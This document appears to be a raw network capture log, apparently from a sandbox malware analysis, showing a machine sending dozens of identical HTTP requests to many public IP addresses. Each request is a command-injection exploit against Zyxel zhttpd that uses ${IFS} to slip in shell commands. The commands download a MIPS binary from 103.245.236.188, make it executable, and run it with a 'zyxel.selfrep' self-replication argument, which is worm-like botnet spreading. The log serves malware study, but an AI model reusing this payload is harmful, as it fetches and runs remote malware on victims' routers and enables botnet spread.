                                                Jan 12, 2024 18:16:39.841707945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8720192.168.2.2360942135.192.144.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841753960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8721192.168.2.2343782155.145.24.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841810942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8722192.168.2.234174048.190.102.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841847897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8723192.168.2.2357504206.92.233.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841860056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8724192.168.2.2346452154.46.246.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841901064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8725192.168.2.2358860112.202.79.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.841963053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8726192.168.2.2339112123.31.58.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842019081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8727192.168.2.2340474150.239.254.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842041016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8728192.168.2.2333250101.177.84.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842078924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8729192.168.2.235417284.64.83.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842114925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8730192.168.2.234325638.31.30.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842150927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8731192.168.2.2357138134.224.78.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842190981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8732192.168.2.233716690.209.137.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842222929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8733192.168.2.2333368118.47.120.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842283010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8734192.168.2.235072058.124.18.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842298985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8735192.168.2.2346002222.105.92.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842354059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8736192.168.2.2339600202.155.160.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842391968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8737192.168.2.2355140163.54.38.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842422962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8738192.168.2.233696252.99.65.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842468023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8739192.168.2.235806691.191.51.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842489958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8740192.168.2.235267248.27.40.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.842540026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8741192.168.2.2335750183.53.236.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.845923901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8742192.168.2.234567091.215.48.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.845949888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8743192.168.2.2332870192.169.42.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.846025944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8744192.168.2.2357770165.58.17.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.846051931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8745192.168.2.234305886.237.11.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:39.846097946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8746192.168.2.2360604219.18.247.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853777885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8747192.168.2.235891082.149.200.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853802919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8748192.168.2.2356328177.68.9.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853831053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8749192.168.2.235868646.11.138.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853916883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8750192.168.2.2336334123.94.214.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853969097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8751192.168.2.2337330212.213.232.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.853990078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8752192.168.2.2352408157.242.143.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854027033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8753192.168.2.2334816148.205.134.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854075909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8754192.168.2.2343736129.26.222.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854130030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8755192.168.2.2345912106.242.167.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854152918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8756192.168.2.234183041.32.255.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854199886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8757192.168.2.235881012.247.178.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854233027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8758192.168.2.23468781.75.228.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854285002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8759192.168.2.234879486.64.136.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854300976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8760192.168.2.235092685.250.42.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854356050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8761192.168.2.234101470.70.25.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854387999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8762192.168.2.2335882125.181.93.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854429960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8763192.168.2.2359208208.162.60.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854484081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8764192.168.2.235913282.2.20.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854538918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8765192.168.2.2334660144.117.61.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854578018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8766192.168.2.2352116126.0.124.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854619980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8767192.168.2.2352432139.121.58.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854677916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8768192.168.2.235724459.167.120.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854696989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8769192.168.2.233861889.221.197.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854722977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8770192.168.2.234982817.67.176.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854779005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8771192.168.2.233824686.193.253.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854825020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8772192.168.2.2358960152.10.153.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854856968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8773192.168.2.2354304171.171.91.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854890108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8774192.168.2.236031213.164.119.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854943037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8775192.168.2.2347562124.232.61.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.854984045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8776192.168.2.2359020160.203.176.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855027914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8777192.168.2.234628852.84.204.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855046034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8778192.168.2.2334556223.187.24.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855107069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8779192.168.2.234332265.141.150.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855133057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8780192.168.2.2337476105.183.254.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855195999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8781192.168.2.235044657.84.22.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.855225086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8782192.168.2.2338358205.91.140.115443
                                                TimestampBytes transferredDirectionData
